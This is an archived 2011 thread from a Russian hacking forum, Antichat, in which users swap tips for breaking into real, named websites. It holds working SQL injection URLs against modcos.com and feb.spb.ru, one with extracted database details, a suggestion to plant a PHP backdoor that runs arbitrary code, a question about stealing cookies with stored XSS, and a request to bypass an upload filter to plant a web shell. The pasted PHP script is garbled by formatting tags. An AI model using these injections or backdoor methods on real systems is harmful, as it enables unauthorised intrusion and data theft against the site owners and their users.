ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.08.2011, 22:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от DJ
[akep"]
DJ ][akep said:
Вот вспоминл)) Я о этом имел ввиду
Я думаю лучше в качестве бекдора оставить не инклуд, а выполнение произвольного php кода, например
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Вызывается так: php?code=phpinfo();
Можно придумать миллион других примеров.
|
|
|
|
20.08.2011, 00:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
285
Репутация:
0
|
|
Код:
Code:
http://modcos.com/news.php?id=42
нашол количество столбцов - 6
но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.
в чем причина? |
|
|
|
20.08.2011, 03:10
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от kokes
kokes said:
Код:
Code:
http://modcos.com/news.php?id=42
нашол количество столбцов - 6
но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.
в чем причина? Там WAF, на связку UNION SELECT и при встрече OR, т.е. ORDER попадает тоже под фильтр.
Ну... Крути как Blind:
http://modcos.com/news.php?id=42+and+substring(version(),1,1)=5 - Валидный запрос
http://modcos.com/news.php?id=42+and+substring(version(),1,1)=4 - FALSE
Когда запрос вовзращает TRUE, то выводятся там все комментарии. Можно раскрутить как Blind.
user() \ 033038003_adminm@localhost
version() \ 5.0.67-percona-highperf-b7-log
database() \ babinsoft_modcos
|
|
|
20.08.2011, 03:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
1048
Репутация:
0
|
|
вообщем случайно нашел активную хсс
и не понимаю как сделать так что бы воровались куки на форуме
Сама активка на главной странице сайта site.com
Если я кину сылку на форуме (на главную страницу с хсс)..это как бы получится пасивка же..как сделать в такой ситуации что бы при просмотре темы на форуме выполнялась активка?
И какой толк в таких активках, например в поле имя при регистрации итд?
|
|
|
|
20.08.2011, 14:52
|
|
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591
Репутация:
43
|
|
reddim
Больше информации тебе в этой теме ни кто не даст, читай маны.
Тут всё написано /thread20140.html
|
|
|
|
20.08.2011, 21:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
14366
Репутация:
0
|
|
Подскажите почему не выводиться содержимое колонок?
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +users--
|
|
|
|
20.08.2011, 21:36
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Samael91
Samael91 said:
Подскажите почему не выводиться содержимое колонок?
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +users--
там нет такой таблички..потому и не выводит
|
|
|
|
20.08.2011, 21:38
|
|
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074
Репутация:
0
|
|
Samael91, таблица `users` находится в БД `test_base`, текущая - `zorro_feb`.
Код:
Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from+test_base.users+limit+1,1+--+
|
|
|
|
21.08.2011, 01:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]$height[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$newheight[/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/a>"[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]) and[/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])
die([/COLOR][COLOR="#0000BB"]$lerror2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$ext[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]"jpg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"jpeg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"JPG"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"JPEG"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"gif"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"GIF"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"png"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"PNG"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"])),[/COLOR][COLOR="#0000BB"]$ext[/COLOR][COLOR="#007700"]))
die([/COLOR][COLOR="#0000BB"]$lerror3[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]());
if ([/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"]);
else
[/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$upl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
if ([/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_xxx."[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]);
else
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]]);
foreach([/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$http[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$file_to_upload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]];
if (isset([/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$file_to_upload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"];
}
include([/COLOR][COLOR="#DD0000"]"admin/config.php"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$jsc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"rel='lightbox'"[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$jsc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$http[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"upload_image/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$http_thumb_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$http[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"upload_image/thumb/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_to_upload[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"upload_image/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]resizeimаgе[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"upload_image/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"upload_image/thumb/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$thumb_size[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$thumb_size[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"Error!"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lyzezagry[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$leve[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Изображение доступно только для лиц лет
Загрузить еще
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"BBCode:
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"HTML:
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\">
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ladressiii[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]":
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];
}
else
die([/COLOR][COLOR="#0000BB"]$lerror2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Скрипт заливки изображений, хочу чрез его залить шелл. Можно обойти фильтрацию? |
|
|
|
21.08.2011, 02:22
|
|
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124
Репутация:
65
|
|
фильтрация защищена от заливки вроде полностью. кстати даже очень хорошо написан код)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
